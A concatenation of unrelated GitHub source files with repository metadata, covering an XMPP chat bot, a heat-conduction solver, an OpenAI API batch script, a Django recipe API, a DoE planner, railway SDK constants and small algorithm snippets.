# 注意:由于 gtalk 客户端的错误处理,提供了一个使用命令离开的方式
jid = self.request.get('from')
L = utils.MemLock('delete_user')
L.require()
try:
gaetalk.del_user(jid)
finally:
L.release()
class XMPPMsg(webapp.RequestHandler):
def post(self):
try:
message = xmpp.Message(self.request.POST)
gaetalk.handle_message(message)
except xmpp.InvalidMessageError:
logging.info('InvalidMessageError: %r' % self.request.POST)
class XMPPAvail(webapp.RequestHandler):
def post(self):
'''show 可以是 away、dnd(忙碌)或空(在线)'''
jid, resource = self.request.get('from').split('/', 1)
status = self.request.get('status')
show = self.request.get('show')
logging.debug(u'%s 的状态: %s (%s)' % (jid, status, show))
try:
show = gaetalk.STATUS_CODE[show]
except KeyError:
logging.error('%s has sent an incorrect show code %s' % (jid, show))
return
try:
gaetalk.send_status(self.request.get('from'))
except xmpp.Error:
logging.error('Error while sending presence to %s' % jid)
return
u = gaetalk.get_user_by_jid(jid)
if u is not None:
modified = False
if resource not in u.resources:
u.resources.append(resource)
modified = True
if u.avail != show:
if u.avail == gaetalk.OFFLINE:
u.last_online_date = datetime.datetime.now()
u.avail = show
modified = True
if modified:
gaetalk.log_onoff(u, show, resource)
u.put()
if config.warnGtalk105 and resource.startswith('Talk.v105'):
xmpp.send_message(jid, u'您的客户端使用明文传输数据,为了大家的安全,请使用Gtalk英文版或者其它使用SSL加密的客户端。')
else:
gaetalk.try_add_user(jid, show, resource)
class XMPPUnavail(webapp.RequestHandler):
def post(self):
jid, resource = self.request.get('from').split('/', 1)
logging.info(u'%s 下线了' % jid)
taskqueue.add(url='/_admin/queue', queue_name='userunavailable', params={'jid': jid, 'resource': resource})
class XMPPProbe(webapp.RequestHandler):
def post(self):
fulljid = self.request.get('from')
try:
gaetalk.send_status(fulljid)
except xmpp.Error:
logging.error('Error while sending presence to %s' % fulljid)
class XMPPDummy(webapp.RequestHandler):
def post(self):
pass
class UserUnavailable(webapp.RequestHandler):
def post(self):
jid = self.request.get('jid')
resource = self.request.get('resource')
u = gaetalk.get_user_by_jid(jid)
if u is not None:
if resource in u.resources:
u.resources.remove(resource)
if not u.resources:
u.avail = gaetalk.OFFLINE
u.last_offline_date = datetime.datetime.now()
u.put()
gaetalk.log_onoff(u, gaetalk.OFFLINE, resource)
application = webapp.WSGIApplication(
[
('/_ah/xmpp/subscription/subscribed/', XMPPSub),
('/_ah/xmpp/subscription/unsubscribed/', XMPPUnsub),
('/_ah/xmpp/message/chat/', XMPPMsg),
('/_ah/xmpp/presence/available/', XMPPAvail),
('/_ah/xmpp/presence/unavailable/', XMPPUnavail),
('/_ah/xmpp/presence/probe/', XMPPProbe),
('/_ah/xmpp/subscription/subscribe/', XMPPDummy),
('/_ah/xmpp/subscription/unsubscribe/', XMPPDummy),
('/_admin/queue', UserUnavailable),
],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
| lilydjwg/gaetalk | chatmain.py | chatmain.py | py | 4,035 | python | en | code | 22 | github-code | 36 |
9340019814 | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 21 11:01:53 2017
@author: PiotrTutak
"""
import numpy as np
import scipy.linalg as lg
import matplotlib.pyplot as plt
print("Podaj L1 L2 L3 L4")
L=[float(x) for x in input().strip().split()]
print('Podaj k S q alfa tInf')
k,S,q,alfa,tInf=(float(x) for x in input().strip().split())
C=[k*S/l for l in L]
L=[sum(L[:i]) for i in range(len(L)+1)]
A=np.array([
[C[0],-C[0],0,0,0],
[-C[0],C[0]+C[1],-C[1],0,0],
[0,-C[1],C[1]+C[2],-C[2],0],
[0,0,-C[2],C[2]+C[3],-C[3]],
[0,0,0,-C[3],C[3]+alfa*S]
])
P=np.array([
q*S,
0,
0,
0,
-alfa*S*tInf
])
P=-P
#t=np.linalg.solve(A,P)
t=lg.solve(A,P)
print(t)
plt.plot(L,t,'ro')
plt.show()
| ptutak/MES | zad01.py | zad01.py | py | 748 | python | en | code | 0 | github-code | 36 |
43823721553 | import json
import random
import re
import os
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from tqdm import tqdm
import requests
from template import *
proxies = {
'http': '127.0.0.1:9898',
'https': '127.0.0.1:9898',
}
ori_keys = json.load(open("../../data/120_key1.json"))
keys = [key for key, v in ori_keys.items() if v]
unused_keys = keys.copy()
used_keys = []
overload_keys = []
invalid_keys = []
def get_valid_key():
global unused_keys, used_keys, overload_keys
current_time = time.time()
new_overload_keys = []
for key, timestamp in overload_keys:
if current_time - timestamp >= 60:
unused_keys.append(key)
else:
new_overload_keys.append((key, timestamp))
overload_keys = new_overload_keys
while not unused_keys:
time.sleep(5)
key = random.choice(unused_keys)
unused_keys.remove(key)
used_keys.append(key)
return key
def make_chat_request(prompt, max_length=1024, timeout=10, logit_bias=None, max_retries=5):
global unused_keys, used_keys, overload_keys
for index in range(max_retries):
key = get_valid_key()
try:
with requests.post(
url=f"https://api.openai.com/v1/chat/completions",
headers={"Authorization": f"Bearer {key}"},
json={
"model": "gpt-3.5-turbo",
"temperature": 1.0,
"messages": [{'role': 'user', 'content': prompt}],
"max_tokens": max_length,
"top_p": 1.0,
"logit_bias": logit_bias,
},
# proxies=proxies,
timeout=timeout
) as resp:
if resp.status_code == 200:
used_keys.remove(key)
unused_keys.append(key)
return json.loads(resp.content)
elif json.loads(resp.content).get('error'):
print(json.loads(resp.content).get('error'))
if json.loads(resp.content).get('error')['message'] == "You exceeded your current quota, please check your plan and billing details.":
invalid_keys.append(key)
else:
overload_keys.append((key, time.time()))
except requests.exceptions.RequestException as e:
used_keys.remove(key)
unused_keys.append(key)
timeout += 5
if timeout >= 20:
logit_bias = {"13": -100, "4083": -100}
print(f"Error with key {key}: {e}")
else:
logit_bias = dict(list(logit_bias.items())[:int(len(logit_bias) / 2)])
def get_uncompleted_data(file_path, out_path):
all_uuids = {json.loads(line)["uuid"] for line in open(file_path)}
completed_uuids = {json.loads(line)['input']["uuid"] for line in open(out_path) if json.loads(line)["output"] != ["network error"]}
completed_data = [json.loads(line) for line in open(out_path) if json.loads(line)['input']["uuid"] in completed_uuids]
uncompleted_uuids = all_uuids - completed_uuids
if uncompleted_uuids:
with open(out_path, "w") as f:
for item in completed_data:
f.write(json.dumps(item) + "\n")
data = [json.loads(line) for line in open(file_path) if json.loads(line)["uuid"] in uncompleted_uuids]
return data
def pross_answer(input_string):
if input_string.startswith("yes"):
return "yes"
if input_string.startswith("no"):
return "no"
if input_string.startswith("unknown"):
return "unknown"
return input_string
def process_one_data(args):
data, relation, mode = args
try:
data = eval(data)
except:
data = data
prompt, logit_bias = data['query']["prompt"], data['query']["logit_bias"]
answer = make_chat_request(prompt, logit_bias=logit_bias)
try:
answer = answer['choices'][0]['message']['content']
answer = pross_answer(answer.strip().lower())
except:
answer = ["network error"]
item = {
"input": data,
"output": answer
}
with open(f"./data/{mode}/query_result/{relation}.json", "a") as f:
f.write(json.dumps(item) + "\n")
return "success"
def process_all_data(data_list, relation, mode):
results = []
max_threads = min(os.cpu_count(), len(keys) - len(invalid_keys))
with ThreadPoolExecutor(max_workers=max_threads) as executor:
futures = {executor.submit(process_one_data, (data, relation, mode)): data for data in data_list}
with tqdm(total=len(data_list), desc=f"{relation, relation_list.index(relation)}") as progress_bar:
for future in as_completed(futures):
try:
result = future.result()
results.append(result)
except Exception as e:
print(f"Error occurred while processing data: {e}")
progress_bar.update(1)
for id in invalid_keys:
ori_keys[id] = False
# 将更改后的数据写回到 JSON 文件中
with open("../../data/120_key1.json", 'w') as file:
json.dump(ori_keys, file)
| bigdante/nell162 | backup/verification/chatgpt_gen_yes_no/utils.py | utils.py | py | 5,313 | python | en | code | 0 | github-code | 36 |
1854382 | def read_reversed_graph(edge_number):
graph = {}
for i in range(edge_number):
v1, v2 = map(str, input().split())
graph[v2] = graph.get(v2, []) + [v1]
return graph
def define_ancestor(tree, v1, v2):
q1 = [v1]
q2 = [v2]
while q1[-1] != q2[-1]:
if tree.get(q1[-1], []):
q1.append(tree.get(q1[-1], [])[0])
if tree.get(q2[-1], []):
q2.append(tree.get(q2[-1], [])[0])
for i in range(-1, -min(len(q1), len(q2)) -1, -1):
if q1[i] != q2[i]:
return q1[i + 1]
vx1, vx2 = map(str, input().split())
my_graph = read_reversed_graph(int(input()))
print(define_ancestor(my_graph, vx1, vx2))
| andrewsonin/4sem_fin_test | _19_tree_common_ancestor.py | _19_tree_common_ancestor.py | py | 704 | python | en | code | 0 | github-code | 36 |
74704594025 | import pandas as pd
import numpy as np
import regex as re
# the usual import horror in python
# https://stackoverflow.com/questions/35166821/valueerror-attempted-relative-import-beyond-top-level-package
from ...config.config import Config
class ExperimentalPlan:
'''
Class for creating an experimental Plan based on DoE.
planType [str]: type of doe plan (e.g. plackett-burrmann, lhs, ...)
planType [str]: configuration params for the DoE plan (e.g.
number of factors, number of levels, ...). Depends
on pyDOE2 specs.
rawPlan [np.array]: raw plan with abstract values (usually -1,0,
1 but depends on type)
factorPlan [pd.DataFrame]: plan with real factor values
nrTests [int]: number of tests runs of the plan
'''
def __init__(self, config: Config):
self.factorFile = 'factors.csv'
self.planType = config.planType
self.rawPlan = np.array(0)
self.factorPlan = pd.DataFrame()
self.factorList = []
self.nrTests = 0
print('\t\tExperimental Plan created: plan_%s.csv'%config.planType )
def setNrTests(self):
self.nrTests = len(self.rawPlan)
def setFactorList(self):
self.factorList = list(pd.read_csv(self.factorFile, index_col='name').index)
def convertPlanToRangeZeroOne(self):
rawPlanRangeZeroOne = np.zeros((len(self.rawPlan[:, 0]), len(self.rawPlan[0, :])))
# loop through columns of rawPlan
for j in range(len(self.rawPlan[0, :])):
factorCol = self.rawPlan[:, j]
mini = min(factorCol)
maxi = max(factorCol)
# loop through rows of rawPlan
for i in range(len(factorCol)):
currentCell = float(self.rawPlan[i, j])
rawPlanRangeZeroOne[i, j] = 0 + (1 - 0) * (currentCell - mini) / (maxi - mini)
self.rawPlan = rawPlanRangeZeroOne
def printFactorPlanToFile(self, pathToPlanFile):
self.factorPlan.to_csv(pathToPlanFile)
def printRawPlanToFile(self, pathToRawPlanFile):
pd.DataFrame(self.rawPlan).to_csv(pathToRawPlanFile,
header=self.factorList)
def getFactorValuesOfTestRun(self, testNr):
return dict(self.factorPlan.iloc[testNr])
def checkFactorMatchingToRawPlan(self):
# checking that numbers of factors in factors.csv matches the
# configuration parameters from *.conf
nrFactorsCSV = len(self.factorList)
nrFactorsRawPlan = len(self.rawPlan[0, :])
if nrFactorsCSV != nrFactorsRawPlan:
raise ValueError(
'The number of factors in factors.csv does not match to the plan created with config.conf.')
def convertRawPlanToFactorPlan(self, pathToFactorFile):
dfFactors = pd.read_csv(pathToFactorFile, index_col='name')
self.factorPlan = pd.DataFrame(self.rawPlan.copy())
self.factorPlan.columns = self.factorList
# loop through all factors (columns of rawPlan)
j = 0
factorsWithExprList = []
posOfFactorWithExpr = []
for factor in self.factorList:
factorCol = self.rawPlan[:, j].copy()
factorMin = str(dfFactors.loc[factor].at['min'])
factorMax = str(dfFactors.loc[factor].at['max'])
# check if factor min is a number (float or int)
if re.match('[\-|\+]?[0-9]+[\.]?[0-9]*', factorMin) is None \
or re.match('[\-|\+]?[0-9]+[\.]?[0-9]*', factorMax) is None:
# if true factorMin/Max should be a math expression like 'a+b/2'
# it is necessary to save these columns for later because they
# depend on other factors values which need to be calculated first
factorsWithExprList.append(factor)
posOfFactorWithExpr.append(j)
# these are dummy values that no error occurs
factorMin = 0
factorMax = 0
factorMin = float(factorMin)
factorMax = float(factorMax)
factorCol *= factorMax - factorMin
factorCol += factorMin
# overwrite column of factorPlan
self.factorPlan[factor] = factorCol
j += 1
# loop through the previous saved factor with expression in factorMin/Max
factorRegex = '|'.join(self.factorList)
j = 0
for factorWithExpr in factorsWithExprList:
factorCol = self.rawPlan[:, posOfFactorWithExpr[j]]
factorMin = str(dfFactors.loc[factorWithExpr].at['min'])
factorMax = str(dfFactors.loc[factorWithExpr].at['max'])
if re.match('[\-|\+]?[0-9]+[\.]?[0-9]*', factorMin) is None:
factorMin = self.__calcMinMaxForStrExpression(factorCol, factorRegex, factorMin)
else:
factorMin = float(factorMin)
if re.match('[\-|\+]?[0-9]+[\.]?[0-9]*', factorMax) is None:
factorMax = self.__calcMinMaxForStrExpression(factorCol, factorRegex, factorMax)
else:
factorMax = float(factorMax)
factorCol *= factorMax - factorMin
factorCol += factorMin
# overwrite column of factorPlan
self.factorPlan[factorWithExpr] = factorCol
j += 1
def __calcMinMaxForStrExpression(self, factorCol, factorRegex, minMax):
minMaxCol = np.zeros(len(factorCol))
# loop through all tests
i = 0
for testNr in range(len(factorCol)):
# get all factors, operators (+-*/) and number (float or int)
expressionList = re.findall('%s|[+|\-|\*|/]|[[0-9]+[\.]?[0-9]*' % (factorRegex), minMax)
# extract factors from expressionlist
factorsInExprList = list(set(expressionList) & set(self.factorList))
# calculate values for factor with min or max
for factorInExpr in factorsInExprList:
factorValue = self.factorPlan.loc[i].at[factorInExpr]
factorExpr = minMax.replace(factorInExpr, str(factorValue))
# calculate expression
minMaxCol[i] = eval(factorExpr)
i += 1
return minMaxCol
| csRon/autodoe | src/preProcessor/experimentalPlans/experimentalPlan.py | experimentalPlan.py | py | 6,290 | python | en | code | 0 | github-code | 36 |
3276810925 | from django.contrib.auth import get_user_model
from django.db.models import F, Sum
from django.http.response import HttpResponse
from django_filters.rest_framework import DjangoFilterBackend
from djoser.views import UserViewSet as DjoserUserViewSet
from recipes.models import (AmountIngredientRecipe, Favorite, Follow,
Ingredient, Recipe, ShoppingCart, Tag)
from rest_framework import permissions, status, viewsets
from rest_framework.decorators import action
from rest_framework.generics import get_object_or_404
from rest_framework.response import Response
from .filters import IngredientFilter, RecipeFilter
from .mixins import FavoriteShoppingcartMixin
from .permissions import IsOwnerAdminOrReadOnly
from .serializers import (FollowSerializer, IngredientSerializer,
RecipesSerializer, TagSerializer)
User = get_user_model()
class UsersViewSet(DjoserUserViewSet):
"""Вьюсет для пользователей"""
@action(
methods=['post', 'delete'],
detail=True,
permission_classes=[permissions.IsAuthenticated],
)
def subscribe(self, request, id):
"""
Создаётся или удаляется подписка на пользователя.
:param request: данные запроса.
:param pk: id пользователя на которого нужно подписаться(отписаться).
:return:
"""
user = request.user
author = get_object_or_404(User, id=id)
is_subscribed = Follow.objects.filter(
user=user,
author=author
).exists()
if request.method == 'DELETE':
if not is_subscribed:
return Response(
{'errors': 'Вы не были подписаны на этого автора'},
status=status.HTTP_400_BAD_REQUEST
)
Follow.objects.get(user=user, author=author).delete()
return Response(status=status.HTTP_204_NO_CONTENT)
if user == author:
return Response(
{'errors': 'Подписка самого на себя невозможна'},
status=status.HTTP_400_BAD_REQUEST
)
if is_subscribed:
return Response(
{'errors': 'Вы уже подписаны на этого пользователя'},
status=status.HTTP_400_BAD_REQUEST
)
Follow.objects.create(user=user, author=author)
serializer = FollowSerializer(
author,
context={'request': request}
)
return Response(serializer.data, status=status.HTTP_201_CREATED)
@action(
methods=['get'],
detail=False,
permission_classes=[permissions.IsAuthenticated],
)
def subscriptions(self, request):
"""
Получаем всех пользователей на которых подписан.
:param request: данные запроса.
:return: Возвращает сериализованные данные через FollowSerializer
с пагинацией.
"""
queryset = User.objects.filter(following__user_id=request.user.id)
page = self.paginate_queryset(queryset)
serializer = FollowSerializer(
page,
many=True,
context={'request': request}
)
return self.get_paginated_response(serializer.data)
class TagViewSet(viewsets.ReadOnlyModelViewSet):
"""
Вьюсет для тегов.
Теги доступны только для чтения.
"""
queryset = Tag.objects.all()
serializer_class = TagSerializer
pagination_class = None
class IngredientViewSet(viewsets.ReadOnlyModelViewSet):
"""
Вьюсет для ингредиентов.
Теги доступны только для чтения.
"""
queryset = Ingredient.objects.all()
serializer_class = IngredientSerializer
pagination_class = None
filter_backends = (DjangoFilterBackend,)
filterset_class = IngredientFilter
class RecipesViewSet(viewsets.ModelViewSet, FavoriteShoppingcartMixin):
"""Вьюсет для рецептов"""
queryset = Recipe.objects.all()
serializer_class = RecipesSerializer
permission_classes = (IsOwnerAdminOrReadOnly,)
filter_backends = (DjangoFilterBackend,)
filterset_class = RecipeFilter
@action(
methods=['post', 'delete'],
detail=True,
permission_classes=[IsOwnerAdminOrReadOnly],
)
def favorite(self, request, pk):
"""
Добавляет(удаляет) рецепт в избранное пользователя.
:param pk: id добавляемого рецепта.
:param request: данные запроса.
:return: Возвращает сериализованный рецепт, который добавили
или удалили из избранного.
"""
return self.add_del_to_db(
request=request,
pk=pk,
related_model=Favorite
)
@action(
methods=['post', 'delete'],
detail=True,
permission_classes=[IsOwnerAdminOrReadOnly],
)
def shopping_cart(self, request, pk):
"""
Добавляет(удаляет) рецепт в корзину для покупок.
:param pk: id добавляемого рецепта.
:param request: данные запроса.
:return: Возвращает сериализованный рецепт, который добавили
или удалили в корзину для покупок.
"""
return self.add_del_to_db(
request=request,
pk=pk,
related_model=ShoppingCart
)
@action(
methods=['get'],
detail=False,
permission_classes=[IsOwnerAdminOrReadOnly],
)
def download_shopping_cart(self, request):
"""
Формирует файл списка продуктов из рецептов в списке покупок.
:param request:
:return:
"""
user = request.user
if user.is_anonymous:
raise permissions.exceptions.AuthenticationFailed
if not user.shoppingcart.all().exists():
return Response(status=status.HTTP_400_BAD_REQUEST)
recipes_of_user = user.shoppingcart.values('recipe')
ingredients_in_recipes = AmountIngredientRecipe.objects.filter(
recipe__in=recipes_of_user
)
sum_ingredients = ingredients_in_recipes.values(
ingredient_name=F('ingredient__name'),
measurement_unit=F('ingredient__measurement_unit')
).annotate(amount=Sum('amount'))
list_ingredients = (f'Список продуктов для пользователя с именем: '
f'{user.get_full_name()}\n\n')
for ingredient in sum_ingredients:
ingredient_str = (f'{ingredient["ingredient_name"]} '
f'({ingredient["measurement_unit"]}) - '
f'{ingredient["amount"]}\n')
list_ingredients += ingredient_str
file_name = f'shopping_cart_{user.username}.txt'
response = HttpResponse(
content=list_ingredients,
content_type='text/plain; charset=utf-8',
status=status.HTTP_200_OK,
)
response['Content-Disposition'] = f'attachment; filename={file_name}'
return response
| MihVS/foodgram-project-react | backend/foodgram/api/views.py | views.py | py | 7,796 | python | ru | code | 0 | github-code | 36 |
6690254075 | class BonusCardType:
BONUS_CARD = 'BonusCard'
UNIVERSAL_CARD = 'UniversalCard'
RZHD_BINNUS_DISCOUNT = 'RzdBonusDiscount'
class SegmentType:
# Неопределенный
UNKNOWN = 'Unknow'
# Одиночный ЖД сегмент
RAILWAY = 'Railway'
# Паромный сегмент
FERRY = 'Ferry'
# ЖД сегмент, но в заказе еще есть паромный сегмент
RAILWAY_FERRY = 'Railwaywithferry'
# Автобусный сегмент
BUS = 'Bus'
# ЖД сегмент, но в заказе есть еще сегмент с автобусом
RAILWAY_BUS = 'Railwaywithbus'
# ЖД сегмент, но в заказе есть еще паромный сегмент и сегмент с автобусом
RAILWAY_BUS_FERRY = 'Railwaywithbusandferry'
# Направление туда
THERE = 'There'
# Направление обратно
BACK = 'Back'
# ЖД сегмент, направление туда
RAILWAY_THERE = 'Railwaythere'
# ЖД сегмент, направление обратно
RAILWAY_BACK = 'Railwayback'
class DocType:
PASSPORT = 'ПН'
BIRTH_CERTIFICATE = 'СР'
RUSSIAN_FOREIGN_PASSPORT = 'ЗП'
FOREIGN_PASSPORT = 'ЗЗ'
PASSPORT_SEAMAN = 'ПМ'
MILITARY_ID = 'ВБ'
USSR_PASSPORT = 'ПС'
MILITARY_OFFICER_CARD = 'УВ'
STATELESS_PERSON_ODENTITY_CARD = 'БГ'
RESIDENCE_PERMIT = 'ВЖ'
RUSSIAN_TEMPORARY_IDENTITY_CARD = 'СУ'
class TimeSw:
# Временной интервал не учитывается
NO_SW = 0
# Временной интервал применяется к моменту отправки поезда
# (параметры Time_from, Time_to в таком случае принимаются целочисленным типом в интервале [0;24])
TRAIN_DISPATCH = 1
# Временной интервал применяется к моменту прибытия поезда
# (параметры Time_from, Time_to в таком случае принимаются целочисленным типом в интервале [0;23])
TRAIN_ARRIVAL = 2
class DirectionGroup:
# Внутригосударственное сообщение, а также международное сообщение
# со странами-участниками СНГ, Литовской, Латвийской, Эстонской, республиками, Республикой Абхазия
INTERNAL = 0
# Международное сообщение в дальнем зарубежье по глобальным ценам. Направление Россия-Финляндия
RUSSIAN_FINLAND = 1
# Международное сообщение в дальнем зарубежье по глобальным ценам. Направление Восток-Запад
EAST_WEST = 2
class Lang:
RU = 'Ru'
EN = 'En'
DE = 'De'
class TrainWithSeat:
# Получение информации о поездах со свободными местами
FREE_PLACE = 1
# Получение информации обо всех поездах
ALL = 0
class GrouppingType:
# Группировка поездов по типу вагона
TYPE = 0
# Группировка поездов по типу вагона и по классу обслуживания
TYPE_AND_SERVICE = 1
# Группировка по типу вагона и по признакам QM/DM
TYPE_AND_QM_DM = 2
# Группировка по типу мест и цене
PLACE_TYPE_AND_PRICE = 3
# Группировка по номеру вагона и цене
CAR_NUMBER_AND_PRICE = 4
# Без группировки
NONE = 5
class JoinTrains:
# Получение списка поездов со склейкой
WITH_BONDING = 0
# Получение списка поездов без склеивания. Используется в случае, если в одном и том же поезде разные вагоны имеют разное время прибытия
WITHOUT_BONDING = 1
class SearchOption:
# Обычный поиск
DEFAULT = 0
# Включить в поиск маршруты в Крымский федеральный округ
CRIMEA = 1
# Включить в поиск мультимодальные перевозки
MULTIMODAL = 2
# Включить в поиск маршруты в Крымский федеральный округ и мультимодальные перевозки
CRIMEA_AND_MULTIMODAL = 3
# Включить в поиск маршруты с пересадкой
TRANSFER = 4
# Включить в поиск маршруты в Крымский федеральный округ и маршруты с пересадкой
CRIMEA_AND_TRANSFER = 5
# Включить в поиск мультимодальные перевозки и маршруты спересадкой
MULTIMODAL_AND_TRANSFER = 6
# Включить в поиск маршруты в Крымский федеральный округ, маршруты с пересадкой и мультимодалные перевозки
ALL = 7
class AllowedDocType:
PASSPORT = 'ПН'
BIRTH_CERTIFICATE = 'СР'
MILITARY_ID = 'ВБ'
PASSPORT_SEAMAN = 'ПМ'
RUSSIAN_FOREIGN_PASSPORT = 'ЗП'
FOREIGN_PASSPORT = 'ЗЗ'
class Services:
EAT = 'EAT'
PAP = 'PAP'
TV = 'TV'
TRAN = 'TRAN'
COND = 'COND'
BED = 'BED'
SAN = 'SAN'
WIFI = 'WIFI'
class LoyaltyCards:
# Начисление баллов "РЖД Бонус"
RZHD_BONUS_SCORING = 'RzhdB'
# Дорожная карта
RZHD_MAP = 'RzhdU'
# Скидка по карте "РЖД Бонус"
RZHD_BONUS_DISCOUNT = 'RzhdSU'
class CarCategories:
# Купейный вагон РИЦ (KV = КУПЕ)
KUPE = 'РИЦ'
# Мягкий вагон РИЦ (KV=МЯГК)
SOFT = 'РИЦ'
# Мягкий вагон Вагон Люкс (KV=МЯГК)
SOFT_LUX = 'ЛЮКС'
# Вагон класса люкс Вагон СВ (KV = ЛЮКС)
LUX = 'СВ'
class AvailableTariffs:
# Полный
FULL = 1
# Детский (до 10 лет)
CHILD_TO_10 = 2
# Детский без места (до 5 лет)
CHILD_WITHOUT_PLACE_TO_5 = 3
# SENIOR (60+) в Сапсан
SENIOR_SAPSAN = 4
# SENIOR (от 60 лет) ГЕНИАЛЬНО
SENIOR = 5
# JUNIOR (от 12 до 26 лет)
JUNIOR = 6
# Детский (до 12 лет)
CHILD_TO_12 = 7
# Детский без места (до 4 лет)
CHILD_WITHOUT_PLACE_TO_4 = 8
# Детский (до 17 лет)
CHILD_TO_17 = 9
# Детский без места (до 6 лет)
CHILD_WITHOUT_PLACE_TO_6 = 10
# Детский (до 7 лет)
CHILD_TO_7 = 11
# Детский без места(до 10 лет)
CHILD_WITHOUT_PLACE_TO_10 = 12
# Детский (от 10 до 17 лет)
CHILD_FROM_10_TO_17 = 13
# Школьник (для учащихся от 10 лет)
SCHOOLBOY_FROM_10 = 14
# Детский без места (для детей до 12 лет)
CHILD_WITHOUT_PLACE_TO_12 = 15
# Детский без места (для детей до 6 лет) ЧТО ? В ЧЁМ ТУТ РАЗНИЦА С ПУНКТОМ ВЫШЕ ? УФСМАТЬВАШУ
CHILD_2_WITHOUT_PLACE_TO_6 = 16
# Молодежный ЮНИОР (для лиц от 10 до 21 года)
JUNIOR_FROM_10_TO_21 = 17
# Праздничный
FESTIVE = 18
# Свадебный
WEDDING = 19
# Семейный
FAMILY = 20
class PlaceTypeNumber:
# Нижний ярус
TOP = 'Н'
# Верхний ярус
BOTTOM = 'В'
# Средний ярус
MIDDLE = 'С'
# (для сидячих вагонов) Для пассажира с животным
ANIMALS = 'Ж'
# (для сидячих вагонов) Для матери и ребенка
MOTHER_CHILD = 'М'
# (для сидячих вагонов) Для пассажира с детьми
CHILDREN = 'Р'
# (для сидячих вагонов) Для инвалидов
INVALID = 'И'
# (для сидячих вагонов) Переговорная
MEETING_ROOM = 'Г'
# (для сидячих вагонов) Не у стола
NOT_TABLE = 'Н'
# (для сидячих вагонов) У стола
TABLE = 'П'
# (для сидячих вагонов) У детской площадки
PLAYGROUND = 'В'
# (для сидячих вагонов) У стола рядом с детской площадкой
TABLE_PLAYGROUND = 'Б'
# (для сидячих вагонов) Рядом с местами для пассажиров с животными
BESIDE_ANIMALS = 'Д'
# (для сидячих) Откидное
FOLDING = 'О'
# (для сидячих вагонов) Отсек (купе) в поезде Ласточка
SITTING_KUPE = '7'
class Confirm:
# Отказ от зарезервированного заказа
REFUSE = 0
# Подтверждение зарезервированного заказа
CONFIRM = 1
# Выбрано трехчасовое резервирование заказа
THREE_HOURS = 2
class ElectronicRegistration:
# Отказ от электронной регистрации
REFUSE = 0
# Согласие на электронную регистрацию
CONFIRM = 1
# Установка ЭР не возможна
IMPOSSIBLE = 3
# Промежуточный статус, устанавливается до отмены ЭР
PRE_REFUSE= 4
# Промежуточный статус, устанавливается до подтверждения заказа.
PRE_CONFIRM = 5
# Статус ЭР не известен
NO_DATA = 6
# Бланк с ЭР распечатан
PRINTED = 7
# Статусы ЭР в бланках одного заказа различаются
DIFFERENT_DATA = 8
# Ошибочный статус ЭР
ERROR_STATUS = 20
class Test:
# Покупка настоящая (после её подтверждения деньги будут списаны)
REAL = 0
# Покупка тестовая, обращения на резервирование мест в АСУ «Экспресс-3» не было
TEST = 1
class PrintFlag:
# Не распечатан
NOT_PRINTED = 0
# Распечатан
PRINTED = 1
class RzhdStatus:
# Без электронной регистрации
WITHOUT_ELECTRONIC_REGISTRATION = 0
# Электронная регистрация
ELECTRONIC_REGISTRATION = 1
# Оплата не подтверждена
FAILED_PAYMENT = 2
# Аннулирован
CANCELED = 3
# Возвращен
RETURNED = 4
# Возвращены места
RETURNED_PLACES= 5
# Выдан посадочный купон (проездной документ) на бланке строгой отчетности
TICKET_ISSUED = 6
# Отложенная отплата (статус возвращается после создания бронирования)
DEFERRED_PAYMENT = 7
class Registration:
REFUSE = 0
CONFIRM = 1
class ReferenceCode:
CO_SERVICES = 'CO_SERVICES'
LOYALTY_CARDS = 'LOYALTY_CARDS'
class InOneKupe:
# Требование не задано
NONE = 0
# В одном купе/в одном ряду (для вагонов с местами для сидения)
IN_ONE_KUPE_OR_ROW = 1
# Не боковые места
NOT_SIDE = 2
# Места в одном отсеке
IN_ONE_COMPARTMENT = 3
class Bedding:
# В стоимость билета не включено постельное белье
NO_LINENS = 0
# В стоимость билета включено постельное белье
LINENS = 1
class FullKupe:
# Выкуп купе целиком
ALL_KUPE = 1
# Выкуп СВ целиком
ALL_SV = 2
class RemoteCheckIn:
# Без электронной регистрации
WITHOUT_ELECTRONIC_REGISTRATION = 0
# Электронная регистрация
ELECTRONIC_REGISTRATION = 1
# Если ЭР возможна, то при подтверждении ЭР устанавливается автоматически
TRY_AUTO_ER = 2
class PayType:
# Оплата наличными
CASH = 'Cash'
# Credit card. Оплата банковской картой. Данный тип оплаты доступен не всем партнерам.
CREDIT_CARD = 'CC'
class Storey:
# Требования к этажу не заданы
NONE = 0
# Первый этаж вагона
FIRST_STOREY = 1
# Второй этаж вагона
SECOND_STOREY = 2
class PlaceDemands:
# Места не у стола
NO_TABLE = 'Н'
# Места у стола (обычные места)
TABLE = 'П'
# Места рядом с детской площадкой и не у стола
PLAYGROUND_NO_TABLE = 'В'
# Места рядом с детской площадкой и у стола
PLAYGROUND_TABLE = 'Б'
# Места рядом с местами для пассажиров с животными
BESIDE_ANIMALS = 'Д'
# Любое место у стола (включая рядом с местами для пассажиров с животными, детской площадкой и т.д)
ANY_TABLE = 'СТОЛ'
# Места не у стола, включая места рядом с детской площадкой и рядом с местами для пассажиров с животными.
# Обобщающее требование. Рекомендуется использовать в случае, если не выбран номер вагона
PLAYGROUND_ANIMALS_NO_TABLE = 'НСТ'
# Места рядом с детской площадкой
PLAYGROUND = 'ДЕТ'
# Места для инвалидов
INVALID = 'И'
# Места для пассажиров с животными
FOR_ANIMALS = 'Ж'
# Отсек (купе)
KUPE = '7'
# Откидное место
HINGED_SEAT = 'О'
# Место матери и ребенка до 1 года
MOTHER_AND_CHILDREN_TO_1 = 'М'
# Места для пассажиров с детьми
MOTHER_AND_CHILDREN = 'Р'
class TicketFormat:
HTML = 'html'
PDF = 'pdf'
class Gender:
MALE = 'мужское'
FEMALE = 'Женское'
MIXED = 'Смешаное'
class AllLanguages:
# Ответ на всех доступных языках;
ALL = 1
# Ответ только на одном конкретном языке, который указан в элементе Lang
AS_LANG = 0
| spacetab-io/ufs-python-sdk | ufs_sdk/wrapper/types.py | types.py | py | 15,381 | python | ru | code | 7 | github-code | 36 |
70806979943 | import sys
board = [[0]*100 for _ in range(100)] # x, y의 값이 1이상 100이하이므로 2차원 배열 최대 크기가 100 * 100
answer = 0 # 4개 사각형의 면적
for _ in range(4):
x1, y1, x2, y2 = map(int, sys.stdin.readline().split())
for i in range(x1, x2):
for j in range(y1, y2):
